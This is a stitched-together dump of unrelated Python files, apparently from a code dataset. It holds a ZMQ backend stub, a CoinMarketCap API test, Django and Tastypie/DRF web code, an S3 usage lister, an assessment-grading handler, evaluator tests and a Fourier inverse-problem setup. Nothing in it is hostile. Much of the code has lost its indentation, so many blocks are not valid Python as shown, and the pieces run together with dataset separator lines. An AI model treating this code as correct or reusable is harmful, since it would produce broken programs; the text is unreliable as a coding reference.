from quantity.digger.interaction.serialize import (
serialize_pcontract_bars,
serialize_all_pcontracts,
serialize_all_contracts,
)
class Backend(BackendInterface):
## @TODO singleton
SERVER_FOR_UI = 'backend4ui'
SERVER_FOR_SHELL = "backend4shell"
def __init__(self):
log.info("Init Backend..")
self._engine = ZMQEventEngine('Backend')
self._engine.start()
self._shell_srv = EventRPCServer(self._engine,
self.SERVER_FOR_SHELL)
self._ui_srv = EventRPCServer(self._engine,
self.SERVER_FOR_UI)
self.register_functions(self._shell_srv)
self.register_functions(self._ui_srv)
def register_functions(self, server):
server.register('get_all_contracts', self.get_all_contracts)
server.register('get_all_pcontracts', self.get_all_pcontracts)
server.register('get_pcontract', self.get_pcontract)
server.register('get_strategies', self.get_strategies)
server.register('run_strategy', self.run_strategy)
server.register('run_technical', self.run_technical)
def stop(self):
log.info('Backend stopped.')
self._engine.stop()
def get_all_contracts(self):
        # Mock interface: returns hard-coded sample data
data = ['CC.SHFE-1.MINUTE', 'BB.SHFE-1.MINUTE']
pcons = [PContract.from_string(d) for d in data]
contracts = [pcon.contract for pcon in pcons]
return serialize_all_contracts(contracts)
def get_all_pcontracts(self):
        # Mock interface: returns hard-coded sample data
data = ['CC.SHFE-1.MINUTE', 'BB.SHFE-1.MINUTE']
pcontracts = [PContract.from_string(d) for d in data]
return serialize_all_pcontracts(pcontracts)
def get_pcontract(self, str_pcontract):
dm = DataManager()
da = dm.get_bars(str_pcontract)
return serialize_pcontract_bars(str_pcontract, da.data)
def run_strategy(self, name):
""""""
return
def run_technical(self, name):
return
def get_technicals(self):
""" 获取系统的所有指标。 """
from quantity.digger.technicals import get_techs
return get_techs()
def get_strategies(self):
return 'hello'
#backend.get_all_contracts()
#backend.get_pcontract('BB.TEST-1.MINUTE')
if __name__ == '__main__':
backend = Backend()
import time, sys
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
backend.stop()
sys.exit(0)
|
nilq/baby-python
|
python
|
#%% Test Module
from pyCMC import CMC
def test_results(returnVal, tname):
if 'status' in returnVal.keys():
if returnVal['status']['error_code'] == 0:
print('{} works!'.format(tname))
else:
print('Error message: {}'.format(returnVal['status']['error_message']))
else:
print(returnVal)
with open('./cmc_key.key', 'r') as f:
cmc_key = f.readline().strip()
cmc = CMC(cmc_key)
# Map
map_data = cmc.map()
test_results(map_data, 'Map')
# Metadata
meta_data = cmc.metadata(slug='bitcoin,ethereum,litecoin')
test_results(meta_data, 'Metadata')
# Listings
listings = cmc.listings(start=1, limit=5, convert='EUR', convert_id=None, sort='market_cap')
test_results(listings, 'Listings')
# Quotes
quotes = cmc.quotes(coinId=None, slug='ethereum')
test_results(quotes, 'Quotes')
# Global Metrics
metrics = cmc.global_metrics()
test_results(metrics, 'Metrics')
# Convert Price
convert = cmc.convert_price(2, coinId=None, symbol='ETH', convert='USD')
test_results(convert, 'Convert')
# These should return errors before calling the API
print('\nThe remaining functions should all return errors.\n')
# Listings
err_listings = cmc.listings(start=1, limit='10', convert='EUR', convert_id=None, sort='market_cap')
test_results(err_listings, 'Error Listings')
# Quotes
err_quotes = cmc.quotes(coinId=None, slug=None)
test_results(err_quotes, 'Error Quotes')
# Convert Price
err_convert = cmc.convert_price(1.5e9, coinId=None, symbol='ETH', convert='USD')
test_results(err_convert, 'Error Convert')
|
nilq/baby-python
|
python
|
from django.http import HttpResponse, HttpRequest, HttpResponseRedirect
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.core.context_processors import csrf
from django.conf import settings
from django.contrib.auth.models import User, Group
from reports.models import BusinessUnit, Machine
from guardian.shortcuts import get_objects_for_user
try:
BUSINESS_UNITS_ENABLED = settings.BUSINESS_UNITS_ENABLED
except AttributeError:
BUSINESS_UNITS_ENABLED = False
PROJECT_DIR = settings.PROJECT_DIR
def index(request):
#business_units = BusinessUnit.objects.all()
business_units = get_objects_for_user(request.user, 'reports.can_view_businessunit')
    with open(PROJECT_DIR + "/../version", 'r') as handle:
        version = handle.read()
return {'business_units_enabled': BUSINESS_UNITS_ENABLED,
'business_units': business_units,
'webadmin_version': version}
|
nilq/baby-python
|
python
|
#!/Users/juan/venv-3.8.6/bin/python3.8
# Copyright 2020 Telleztec.com, Juan Tellez, All Rights Reserved
#
import boto3
import datetime
import argparse
# convert bytes to kb, mb, and gb
def to_units(b, unit):
if unit=='b':
return b
elif unit=='k':
return round(b/1000, 2)
elif unit=='m':
return round(b/(1000*1000), 2)
elif unit=='g':
return round(b/(1000*1000*1000), 2)
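# Worked example (illustrative values): to_units(1500000, 'm') returns 1.5
# and to_units(2048, 'k') returns 2.05 (both rounded to two decimal places).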
# list_buckets prints the name of all buckets and the creation time
def list_buckets(s3):
for bucket in s3.buckets.all():
d = bucket.creation_date
print('{:<30s}{:>52s}'.format(
bucket.name, d.isoformat(' ')))
# list_bucket_usage prints all buckets, the date of the newest object and the total disk used
def list_bucket_usage(s3, unit):
totalSizeBytes = 0
for bucket in s3.buckets.all():
d = bucket.creation_date
newest = datetime.datetime(datetime.MINYEAR,1,1,tzinfo=datetime.timezone.utc)
for obj in bucket.objects.all():
totalSizeBytes += obj.size
if newest < obj.last_modified:
newest = obj.last_modified
print('{:<30s} {:s} {:s} {:>16.2f}'.format(bucket.name, d.isoformat(' '), newest.isoformat(' '),
to_units(totalSizeBytes, unit)))
# list_files prints all the objects in a bucket.
def list_files(s3, unit):
totalSizeBytes = 0
for bucket in s3.buckets.all():
for obj in bucket.objects.all():
d = obj.last_modified
print('{:<30s}{:>52s} {:>10f}'.format(
bucket.name, d.isoformat(' '), to_units(obj.size, unit)))
def main():
parser = argparse.ArgumentParser(prog='s3ls')
    # default is a one-element list so that region[0] is valid when --region is omitted
    parser.add_argument('--region', nargs=1, default=['us-east-1'],
                        help='AWS region, e.g. us-east-1')
parser.add_argument('--unit', choices=['b','k','m', 'g'], default='b',
help='Unit to display disk usage in: b, k, m or g')
parser.add_argument('do', choices=['space', 'files', 'buckets'], default='space',
help='Tells the tool what to do: Print space usage, list files or buckets')
namespace = parser.parse_args()
args = vars(namespace)
region = args['region']
unit = args['unit']
session = boto3.session.Session()
s3 = session.resource('s3', region[0])
if args['do'] == 'space':
list_bucket_usage(s3, unit)
elif args['do'] == 'buckets':
list_buckets(s3)
elif args['do'] == 'files':
list_files(s3, unit)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
from django.db.models import Count
from tastypie.resources import ModelResource, ALL_WITH_RELATIONS
from tastypie import http, fields
from tastypie.exceptions import ImmediateHttpResponse
from tastypie.bundle import Bundle
import json
from django.core.exceptions import ValidationError, ObjectDoesNotExist
from django.http import HttpResponse
from .models import Run, RunCaseVersion, RunSuite, Result
from ..mtapi import MTResource, MTApiKeyAuthentication, MTAuthorization
from ..core.api import (ProductVersionResource, ProductResource,
ReportResultsAuthorization, UserResource)
from ..environments.api import EnvironmentResource
from ..environments.models import Environment
from ..library.api import (CaseVersionResource, BaseSelectionResource,
SuiteResource)
from ..library.models import CaseVersion, Suite
from ...view.lists.filters import filter_url
import logging
logger = logging.getLogger(__name__)
class RunSuiteAuthorization(MTAuthorization):
"""Atypically named permission."""
@property
def permission(self):
"""This permission should be checked by is_authorized."""
return "execution.manage_runs"
class RunCaseVersionResource(ModelResource):
"""
RunCaseVersion represents the connection between a run and a caseversion.
It is possible to return a result for each runcaseversion. So the result
will sit as a peer to the caseversion under the runcaseversion.
"""
run = fields.ToOneField(
"moztrap.model.execution.api.RunResource",
"run",
related_name="runcaseversion")
caseversion = fields.ToOneField(CaseVersionResource, "caseversion", full=True)
class Meta:
queryset = RunCaseVersion.objects.all()
list_allowed_methods = ['get']
filtering = {
"run": ALL_WITH_RELATIONS,
"caseversion": ALL_WITH_RELATIONS,
}
fields = ["id", "run"]
class RunResource(ModelResource):
"""
Fetch the test runs for the specified product and version.
It is also possible to create a new testrun, when posted.
"""
productversion = fields.ForeignKey(ProductVersionResource, "productversion")
environments = fields.ToManyField(
EnvironmentResource,
"environments",
full=False,
)
runcaseversions = fields.ToManyField(
RunCaseVersionResource,
"runcaseversions",
)
class Meta:
queryset = Run.objects.all()
list_allowed_methods = ["get", "post"]
fields = [
"id",
"name",
"description",
"status",
"productversion",
"environments",
"runcaseversions",
]
filtering = {
"productversion": ALL_WITH_RELATIONS,
"status": "exact",
}
authentication = MTApiKeyAuthentication()
authorization = ReportResultsAuthorization()
always_return_data = True
def dehydrate(self, bundle):
"""Add some convenience fields to the return JSON."""
pv = bundle.obj.productversion
bundle.data["productversion_name"] = pv.version
bundle.data["product_name"] = pv.product.name
return bundle
def dispatch_detail(self, request, **kwargs):
"""For details, we want the full info on environments for the run """
self.fields["environments"].full = True
return super(RunResource, self).dispatch_detail(request, **kwargs)
def dispatch_list(self, request, **kwargs):
"""For list, we don't want the full info on environments """
self.fields["environments"].full = False
return super(RunResource, self).dispatch_list(request, **kwargs)
def create_response(self, request, data,
response_class=HttpResponse, **response_kwargs):
"""On posting a run, return a url to the MozTrap UI for that new run."""
resp = super(RunResource, self).create_response(
request,
data,
response_class=response_class,
**response_kwargs
)
if isinstance(data, Bundle):
# data will be a bundle if we are creating a new Run. And in that
# case we want to add a URI to viewing this new run result in the UI
full_url = filter_url(
"results_runcaseversions",
Run.objects.get(pk=data.data["id"]),
)
new_content = json.loads(resp.content)
new_content["ui_uri"] = full_url
new_content["resource_uri"] = data.data["resource_uri"]
resp.content = json.dumps(new_content)
# need to set the content type to application/json
resp._headers["content-type"] = ("Content-Type", "application/json; charset=utf-8")
return resp
def obj_create(self, bundle, request=None, **kwargs):
"""Set the created_by field for the run to the request's user"""
bundle = super(RunResource, self).obj_create(bundle=bundle, request=request, **kwargs)
bundle.obj.created_by = request.user
bundle.obj.save()
return bundle
def hydrate_runcaseversions(self, bundle):
"""
Handle the runcaseversion creation during a POST of a new Run.
Tastypie handles the creation of the run itself. But we handle the
RunCaseVersions and Results because we have special handler methods for
setting the statuses which we want to keep DRY.
"""
try:
run = bundle.obj
run.save()
# walk results
for data in bundle.data["runcaseversions"]:
status = data.pop("status")
# find caseversion for case
cv = CaseVersion.objects.get(
productversion=run.productversion,
case=data.pop("case"),
)
# create runcaseversion for this run to caseversion
rcv, created = RunCaseVersion.objects.get_or_create(
run=run,
caseversion=cv,
)
data["user"] = bundle.request.user
data["environment"] = Environment.objects.get(
pk=data["environment"])
# create result via methods on runcaseversion
rcv.get_result_method(status)(**data)
bundle.data["runcaseversions"] = []
return bundle
except KeyError as e:
raise ValidationError(
"bad result object data missing key: {0}".format(e))
except ObjectDoesNotExist as e:
raise ValidationError(e)
class ResultResource(ModelResource):
"""
Endpoint for submitting results for a set of runcaseversions.
This endpoint is write only. The submitted result objects should
be formed like this::
{
"objects": [
{
"case": "1",
"environment": "23",
"run_id": "1",
"status": "passed"
},
{
"case": "14",
"comment": "why u no make sense??",
"environment": "23",
"run_id": "1",
"status": "invalidated"
},
{
"bug": "http://www.deathvalleydogs.com",
"case": "326",
"comment": "why u no pass?",
"environment": "23",
"run_id": "1",
"status": "failed",
"stepnumber": 1
}
]
}
"""
class Meta:
queryset = Result.objects.all()
resource_name = "result"
list_allowed_methods = ["patch"]
authentication = MTApiKeyAuthentication()
authorization = ReportResultsAuthorization()
def obj_create(self, bundle, request=None, **kwargs):
"""
Manually create the proper results objects.
This is necessary because we have special handler methods in
RunCaseVersion for setting the statuses which we want to keep DRY.
"""
data = bundle.data.copy()
try:
status = data.pop("status")
case = data.pop("case")
env = Environment.objects.get(pk=data.get("environment"))
run = data.pop("run_id")
except KeyError as e:
raise ValidationError(
"bad result object data missing key: {0}".format(e))
except Environment.DoesNotExist as e:
raise ValidationError(
"Specified environment does not exist: {0}".format(e))
data["environment"] = env
try:
rcv = RunCaseVersion.objects.get(
run__id=run,
caseversion__case__id=case,
environments=env,
)
except RunCaseVersion.DoesNotExist as e:
raise ValidationError(
"RunCaseVersion not found for run: {0}, case: {1}, environment: {2}:\nError {3}".format(
str(run), str(case), str(env), e))
data["user"] = request.user
bundle.obj = rcv.get_result_method(status)(**data)
return bundle
class RunSuiteResource(MTResource):
"""
Create, Read, Update and Delete capabilities for RunSuite.
Filterable by suite and run fields.
"""
run = fields.ForeignKey(RunResource, 'run')
suite = fields.ForeignKey(SuiteResource, 'suite')
class Meta(MTResource.Meta):
queryset = RunSuite.objects.all()
fields = ["suite", "run", "order", "id"]
filtering = {
"suite": ALL_WITH_RELATIONS,
"run": ALL_WITH_RELATIONS
}
authorization = RunSuiteAuthorization()
@property
def model(self):
return RunSuite
@property
def read_create_fields(self):
"""run and suite are read-only"""
return ["suite", "run"]
def hydrate_suite(self, bundle):
"""suite is read-only on PUT
suite.product must match run.productversion.product on CREATE
"""
# CREATE
if bundle.request.META['REQUEST_METHOD'] == 'POST':
suite_id = self._id_from_uri(bundle.data['suite'])
suite = Suite.objects.get(id=suite_id)
run_id = self._id_from_uri(bundle.data['run'])
run = Run.objects.get(id=run_id)
if suite.product.id != run.productversion.product.id:
error_message = str(
"suite's product must match run's product."
)
logger.error(
"\n".join([error_message, "suite prod: %s, run prod: %s"]),
suite.product.id, run.productversion.product.id)
raise ImmediateHttpResponse(
response=http.HttpBadRequest(error_message))
return bundle
class SuiteSelectionResource(BaseSelectionResource):
"""
Specialty end-point for an AJAX call from the multi-select widget
for selecting suites.
"""
product = fields.ForeignKey(ProductResource, "product")
runs = fields.ToManyField(RunResource, "runs")
created_by = fields.ForeignKey(
UserResource, "created_by", full=True, null=True)
class Meta:
queryset = Suite.objects.all().select_related(
"created_by",
).annotate(case_count=Count("cases"))
list_allowed_methods = ['get']
fields = ["id", "name", "created_by"]
filtering = {
"product": ALL_WITH_RELATIONS,
"runs": ALL_WITH_RELATIONS,
"created_by": ALL_WITH_RELATIONS,
}
ordering = ["runs"]
def dehydrate(self, bundle):
"""Add some convenience fields to the return JSON."""
suite = bundle.obj
bundle.data["suite_id"] = unicode(suite.id)
bundle.data["case_count"] = suite.case_count
bundle.data["filter_cases"] = filter_url("manage_cases", suite)
return bundle
|
nilq/baby-python
|
python
|
"""
Copyright 2017 Balwinder Sodhi
Licenced under MIT Licence as available here:
https://opensource.org/licenses/MIT
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
Created on Mar 3, 2017
@author: Balwinder Sodhi
"""
from common import *
from entities import *
import logging
class AssessmentHandler(BaseHandler):
def getAssessmentsTakenByUser(self):
ua_list = AssessmentSubmissionDto.query(AssessmentSubmissionDto.submittedBy
== self.get_current_user_key()).fetch()
data = [{"submissionId": x.key.id(), "submittedOn": x.submittedOn,
"draft": x.draft} for x in ua_list]
self.send_json_response(Const.STATUS_OK, data)
def getPortfolio(self):
a = [p.to_dict_with_id("assessId") for p in
AssessmentDto.query(AssessmentDto.owner == self.get_current_user_key()).fetch()]
q = [p.to_dict_with_id("questionId") for p in
QuestionDto.query(QuestionDto.owner == self.get_current_user_key()).fetch()]
t = [p.to_dict_with_id("trailId") for p in
TrailDto.query(TrailDto.owner == self.get_current_user_key()).fetch()]
p = dict()
p['trails'] = t
p['authoredAssessments'] = a
p['questionBank'] = q
p['content'] = [] # TODO Remove
self.send_json_response(Const.STATUS_OK, p)
def getQuestion(self):
q_id = self.request.params["qid"]
q = QuestionDto.get_by_id(long(q_id))
if q:
self.send_json_response(Const.STATUS_OK, q.to_dict_with_id("questionId"))
else:
self.send_json_response(Const.STATUS_ERROR, "Could not find the requested information.")
def saveQuestion(self):
qf = json.loads(self.request.body)
qid = qf.get("questionId")
if qid:
q = QuestionDto.get_by_id(int(qid))
if q.owner == self.get_current_user_key():
q.populate_from_dict(qf)
q.put()
else:
raise ValueError("Cannot save entity not owned by this user.")
else:
q = QuestionDto(owner=self.get_current_user_key())
q.populate_from_dict(qf)
q.put()
self.send_json_response(Const.STATUS_OK, q.to_dict_with_id("questionId"))
def getAssessmentSubmission(self, sub_key=None):
if sub_key:
asub = sub_key.get()
sid = asub.key.id()
else:
sid = self.request.params["id"]
asub = AssessmentSubmissionDto.get_by_id(long(sid))
if asub:
ta = asub.traiAssessment.get()
else:
raise ValueError("Submission record not found.", sid)
# Fetch the assessment
a_dict = self._fetch_assessment(ta.assess.id(), True)
# Mark the selected answers in assessment as per saved submission
if a_dict:
a_dict["submissionId"] = sid
max_points = 0
for q_dict in a_dict["questions"]:
max_points += q_dict["points"]
# One question may have one or more selected responses
res_list = [x for x in asub.responses if x.questionId.id() == q_dict["questionId"]]
for res in res_list:
# Expected only one match here
if q_dict['type'] != 'FTXT':
aopt_dict = [x_dict for x_dict in q_dict['answerOptions']
if x_dict['answer'] == res.answer]
if aopt_dict: aopt_dict[0]["marked"] = True
else:
# Free text answers have a single answerOptions object
q_dict['answerOptions'][0]['response'] = res.answer
# Include the score
a_dict["score"] = str(asub.score)
a_dict["maxPoints"] = max_points
a_dict["draft"] = asub.draft
self.send_json_response(Const.STATUS_OK, a_dict)
else:
self.send_json_response(Const.STATUS_ERROR, "Record not found!")
def getAssessmentForTaking(self):
if "id" not in self.request.params:
self.send_json_response(Const.STATUS_ERROR, "Missing required params.")
return
a_id = self.request.params["id"]
# First check for an existing in-progress submission
ta = TrailAssessmentDto.query(TrailAssessmentDto.assess ==
ndb.Key(AssessmentDto, long(a_id))).fetch(keys_only=True)
if ta:
sub_keys = AssessmentSubmissionDto.query(
AssessmentSubmissionDto.traiAssessment == ta[0],
AssessmentSubmissionDto.submittedBy == self.get_current_user_key()
).fetch(keys_only=True)
# Found an existing submission
if sub_keys:
logging.info(">>>>>> Found existing submission. ID: %s", sub_keys)
# self.redirect("/#/EditSubmission/%d" % sub_keys[0].id())
self.getAssessmentSubmission(sub_keys[0])
else:
logging.info(">>>>>> Did not find any existing submission. ID: %s", ta)
self.getAssessment(for_taking=True)
def saveAssessmentResponse(self):
ar_dict = self.load_json_request()
# Fix the key properties
for r in ar_dict["responses"]:
r["questionId"] = ndb.Key(QuestionDto, long(r["questionId"]))
if "submissionId" in ar_dict:
sub = AssessmentSubmissionDto.get_by_id(long(ar_dict["submissionId"]))
else:
aid = ar_dict["assessId"]
ta_list = TrailAssessmentDto.query().\
filter(TrailAssessmentDto.assess ==
ndb.Key(AssessmentDto, long(aid))
).fetch(keys_only=True)
if not ta_list:
raise ValueError("Trail assessment record not found for assessment ID %s" % aid)
sub = AssessmentSubmissionDto(traiAssessment = ta_list[0])
sub.populate_from_dict(ar_dict)
sub.submittedBy = self.get_current_user_key()
sub.put()
self.send_json_response(Const.STATUS_OK, sub.to_dict_with_id("submissionId"))
def getAssessmentResult(self):
sid = self.request.params["id"]
sub = AssessmentSubmissionDto.get_by_id(long(sid))
if sub:
# if not sub.draft:
# self.send_json_response(Const.STATUS_ERROR, "Already submitted!")
# return
sub.draft = False
# Calculate score
ta = sub.traiAssessment.get()
res_list = sub.responses
asmt = ta.assess.get()
aq_list = AssessmentQuestionDto.query(
AssessmentQuestionDto.assess == ta.assess).fetch()
# Reset the score
sub.score = 0
for aq in aq_list:
q = aq.assessQtn.get()
# Expected correct answers list
ca_list = [ao.answer for ao in q.answerOptions if ao.correct]
# Submitted answers list
qr_list = [r.answer for r in res_list if r.questionId == aq.assessQtn]
if ca_list == qr_list:
sub.score += aq.points
else:
sub.score += asmt.pointsForWrongAns
# Persist in datastore
sub_key = sub.put()
self.getAssessmentSubmission(sub_key=sub_key)
else:
self.send_json_response(Const.STATUS_ERROR, "Data not found.")
def getAssessment(self, for_taking=False):
aid = self.request.params["id"]
a_dict = self._fetch_assessment(aid, for_taking)
if a_dict:
self.send_json_response(Const.STATUS_OK, a_dict)
else:
self.send_json_response(Const.STATUS_ERROR, "Could not find the requested information.")
def _fetch_assessment(self, aid, for_taking):
a = AssessmentDto.get_by_id(long(aid))
if a:
a_dict = a.to_dict_with_id("assessId")
aq_list = AssessmentQuestionDto.query(
AssessmentQuestionDto.assess == a.key).fetch()
if aq_list:
q_pts = {}
keys = []
for aq in aq_list:
q_pts[aq.assessQtn.id()] = aq.points
keys.append(ndb.Key(QuestionDto, aq.assessQtn.id()))
q_list = ndb.get_multi(keys)
qdict_list = [x.to_dict_with_id("questionId") for x in q_list]
for q in qdict_list:
q["points"] = q_pts[q["questionId"]]
a_dict["questions"] = qdict_list
# Clear the correct flags on answers
if for_taking:
for qd in a_dict["questions"]:
for ao in qd['answerOptions']:
ao['correct'] = None
if qd['type'] == 'FTXT':
ao['answer'] = None
return a_dict
def lookupAssessments(self):
# TODO: Minimize information to be sent
qry = self.request.params["q"]
a_list = AssessmentDto.query(AssessmentDto.owner == self.get_current_user_key()).fetch()
f = [a.to_dict_with_id("assessId") for a in a_list if qry.lower() in a.title.lower()]
self.send_json_response(Const.STATUS_OK, f)
def saveAssessment(self):
asmt = self.load_json_request()
if "assessId" in asmt:
a = AssessmentDto.get_by_id(int(asmt["assessId"]))
logging.debug("Loaded assessment from DB.")
else:
a = AssessmentDto()
logging.debug("Creating new assessment.")
a.populate_from_dict(asmt)
a.owner = self.get_current_user_key()
a_key = a.put()
aq_list = AssessmentQuestionDto.query(
AssessmentQuestionDto.assess == a_key).fetch()
if aq_list:
ndb.delete_multi([x.key for x in aq_list])
logging.debug("Cleared old AQs.")
for aq in asmt["questions"]:
q = AssessmentQuestionDto()
q.assessQtn = ndb.Key(QuestionDto, aq["questionId"])
q.assess = a_key
q.points = aq["points"]
q.put()
a_dict = a.to_dict_with_id("assessId")
a_dict["questions"] = asmt["questions"]
self.send_json_response(Const.STATUS_OK, a_dict)
|
nilq/baby-python
|
python
|
#
# Sample: Gamut clamping
#
from lcms import *
Lab = cmsCIELab(80, -200, 50)
print "Original", Lab
#
# Desaturates color to bring it into gamut.
# The gamut boundaries are specified as:
# -120 <= a <= 120
# -130 <= b <= 130
cmsClampLab(Lab, 120, -120, 130, -130)
print "Constrained", Lab
|
nilq/baby-python
|
python
|
from django.urls import path
from . import views
urlpatterns = [
path("numbers", views.NumberListView.as_view(), name="number_list_view"),
path("numbers/<int:pk>/", views.NumberView.as_view(), name="number_view"),
path("numbers/add_number/", views.NumberEditView.as_view(), name="add_number"),
path('numbers/import_numbers/', views.NumberBulkImportView.as_view(), name='import_numbers'),
path("numbers/<int:pk>/edit/", views.NumberEditView.as_view(), name="number_edit"),
path("numbers/number_bulk_edit", views.NumberBulkEditView.as_view(), name="number_bulk_edit"),
path("numbers/<int:pk>/delete/", views.NumberDeleteView.as_view(), name="number_delete"),
path("numbers/number_bulk_delete", views.NumberBulkDeleteView.as_view(), name="number_bulk_delete"),
path("trunks", views.TrunkListView.as_view(), name="trunk_list_view"),
path("trunks/<int:pk>/", views.TrunkView.as_view(), name="trunk_view"),
path("trunks/add_trunk/", views.TrunkEditView.as_view(), name="add_trunk"),
path('trunks/import_trunks/', views.TrunkBulkImportView.as_view(), name='import_trunks'),
path("trunks/<int:pk>/edit/", views.TrunkEditView.as_view(), name="trunk_edit"),
path("trunks/trunk_bulk_edit", views.TrunkBulkEditView.as_view(), name="trunk_bulk_edit"),
path("trunks/<int:pk>/delete/", views.TrunkDeleteView.as_view(), name="trunk_delete"),
path("trunks/trunk_bulk_delete", views.TrunkBulkDeleteView.as_view(), name="trunk_bulk_delete"),
path("UCClusters", views.UCClusterListView.as_view(), name="uccluster_list_view"),
path("UCClusters/<int:pk>/", views.UCClusterView.as_view(), name="uccluster_view"),
path("UCClusters/add_uccluster/", views.UCClusterEditView.as_view(), name="add_uccluster"),
path('UCClusters/import_ucclusters/', views.UCClusterBulkImportView.as_view(), name='import_ucclusters'),
path("UCClusters/<int:pk>/edit/", views.UCClusterEditView.as_view(), name="uccluster_edit"),
path("UCClusters/uccluster_bulk_edit", views.UCClusterBulkEditView.as_view(), name="uccluster_bulk_edit"),
path("UCClusters/<int:pk>/delete/", views.UCClusterDeleteView.as_view(), name="uccluster_delete"),
path("UCClusters/uccluster_bulk_delete", views.UCClusterBulkDeleteView.as_view(), name="uccluster_bulk_delete"),
path("devicepools", views.DevicePoolListView.as_view(), name="devicepool_list_view"),
path("devicepools/<int:pk>/", views.DevicePoolView.as_view(), name="devicepool_view"),
path("devicepools/add_devicepool/", views.DevicePoolEditView.as_view(), name="add_devicepool"),
path('devicepools/import_devicepools/', views.DevicePoolBulkImportView.as_view(), name='import_devicepools'),
path("devicepools/<int:pk>/edit/", views.DevicePoolEditView.as_view(), name="devicepool_edit"),
path("devicepools/devicepool_bulk_edit", views.DevicePoolBulkEditView.as_view(), name="devicepool_bulk_edit"),
path("devicepools/<int:pk>/delete/", views.DevicePoolDeleteView.as_view(), name="devicepool_delete"),
path("devicepools/devicepool_bulk_delete", views.DevicePoolBulkDeleteView.as_view(), name="devicepool_bulk_delete"),
]
|
nilq/baby-python
|
python
|
import re
import pytest
from ratus import Evaluator, __version__
from ratus.execer import Executor, ExecutorError
from ratus.parse import (
BinaryOp,
BinaryOpType,
Float,
Function,
Integer,
Parser,
ParserError,
String,
UnaryOp,
UnaryOpType,
)
from ratus.token import Token, Tokeniser, TokenLiteral, TokenType
def test_version():
assert __version__ == "0.0.1"
@pytest.mark.parametrize(
("source", "expected", "injected_functions"),
(
pytest.param("1 + 1", 2, None, id="addition"),
pytest.param("1 - 1", 0, None, id="subtraction"),
pytest.param("1 + 3 * 2", 7, None, id="precedence"),
pytest.param("2.0", 2.0, None, id="float_literal"),
pytest.param('"test"', "test", None, id="string_literal"),
pytest.param("if(1 > 2, 10, 5)", 5, None, id="false_conditional"),
pytest.param("if(1<2, 10, 5)", 10, None, id="true_conditional"),
pytest.param("if(if(1<2, 0, 1), 10, 5)", 5, None, id="nested_conditional"),
pytest.param("2 + 3 * 2", 8, None, id="bodmas"),
pytest.param("3 * 2 + 2", 8, None, id="computation_ordering"),
pytest.param("1 > 2", False, None, id="greater_than"),
pytest.param("1 = 1", True, None, id="equals"),
pytest.param("1 != 2", True, None, id="not_equals"),
pytest.param(
"lookup(12345, 'PG')",
10,
{"lookup": lambda x, y: 10},
id="injected_function",
),
pytest.param(
"if(lookup(12345, 'PG') = 10, 5, 4)",
5,
{"lookup": lambda x, y: 10},
id="injected_function_in_conditional",
),
pytest.param(
"add(1, 2)",
3,
{"add": lambda x, y: x + y},
id="function_call_in_computation",
),
),
)
def test_eval(source, expected, injected_functions):
evaluator = Evaluator(injected_functions)
assert evaluator.evaluate(source) == expected
@pytest.mark.parametrize(
("source", "injected_functions", "error_msg"),
(("test(1, 2)", None, "Function 'test' is not defined"),),
)
def test_eval_error(source, injected_functions, error_msg):
evaluator = Evaluator(injected_functions)
with pytest.raises(ExecutorError, match=error_msg):
evaluator.evaluate(source)
|
nilq/baby-python
|
python
|
from hilbert import main
main()
|
nilq/baby-python
|
python
|
from rest_framework import serializers
from attendance.models import Attendance, AttendanceBlock, Session
class SessionSerializer(serializers.ModelSerializer):
subject = serializers.SerializerMethodField()
class Meta:
model = Session
fields = [
"subject",
"start",
"end",
"did_attend",
]
def get_subject(self, obj):
return obj.subject.name
class AttendanceSerializer(serializers.ModelSerializer):
sessions = SessionSerializer(many=True)
class Meta:
model = Attendance
fields = [
"date",
"present",
"absent",
"total",
"sessions",
]
def get_subject(self, obj):
return obj.subject.name
class AttendanceBlockSerializer(serializers.ModelSerializer):
attendance = AttendanceSerializer(many=True)
semester = serializers.SerializerMethodField()
class Meta:
model = AttendanceBlock
fields = [
"semester",
"link",
"total",
"present",
"absent",
"percent",
"updated_at",
"attendance",
]
def get_semester(self, obj):
return obj.semester.semester
|
nilq/baby-python
|
python
|
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import scipy.optimize as opt
import scipy.stats as st
from math import exp, copysign, log, sqrt, pi
import sys
sys.path.append('..')
from rto_l1 import *
# ground truth parameter
thetatruth = np.array([0.5, 1.0, 0, 0.1, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
N_modes = int((len(thetatruth)-1)/2)
# weight functions to penalize high Fourier modes
#weights_cos = np.ones((N_modes,)) # no penalization
weights_cos = 1/np.arange(1, N_modes+1)
#weights_sin = np.ones((N_modes,)) # no penalization
weights_sin = 1/np.arange(1, N_modes+1)
# forward function and Jacobian
def f_fnc(theta, xs):
N_modes = int((len(theta)-1)/2)
temp = theta[0]
for k in range(N_modes):
temp += theta[k+1] * weights_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp += theta[k+N_modes+1] * weights_sin[k]*np.sin((k+1)*xs)
return temp
def Jf_fnc(theta, xs):
N_modes = int((len(theta)-1)/2)
temp = np.zeros((len(xs),2*N_modes+1))
temp[:, 0] = np.ones((len(xs),))
for k in range(N_modes):
temp[:,k+1] = weights_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp[:, k+N_modes+1] = weights_sin[k]*np.sin((k+1)*xs)
return temp
# observation positions
xObs = np.concatenate((np.array([0, 0.2, 0.8, pi/2, 1.7, 1.8, 2.4, pi]), np.random.uniform(2, 3, (20,))), axis=0)
N = len(xObs)
# forward function for fixed observation positions
def f(theta):
return f_fnc(theta, xObs)
def Jf(theta):
return Jf_fnc(theta, xObs)
# observational noise standard deviation
sigma = 0.05
# generate data
y = f_fnc(thetatruth, xObs) + np.random.normal(0, sigma, (len(xObs),))
